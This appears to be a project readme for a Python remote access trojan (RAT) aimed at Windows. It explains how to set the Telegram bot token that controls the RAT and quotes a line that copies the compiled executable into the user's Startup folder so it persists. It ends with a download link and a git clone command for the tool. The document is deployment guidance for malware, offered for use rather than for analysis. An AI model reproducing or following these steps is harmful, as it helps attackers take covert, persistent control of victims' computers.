To replace your robot Token in RAT, simply go to Line 35 in the Windows-Python-RAT.py file and place your API-TOKEN instead of TOKEN.
In Line 35:
#Replace Your Bot API-TOKEN
update = Updater("TOKEN")For startup settings, you must first write the name of your bot before compiling it in the Windows-Python-RAT.py file. For example, before compiling the RAT file, you need to go to line 291 and name it as an YOUR-COMPILED-RAT-NAME.exe.
In Line 291:
os.system('copy YOUR-COMPILED-RAT-NAME.exe "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"')
#replace your rat name on 'YOUR-COMPILED-RAT-NAME.exe'Video Tutorial Setting Up a Startup on a RAT: Watch
Logo:
Setup ScreenShot:
RAT Control Panel @W_P_RAT_Bot:
Download: Click Here
Clone: git clone https://github.com/The404Hacking/Windows-Python-RAT.git



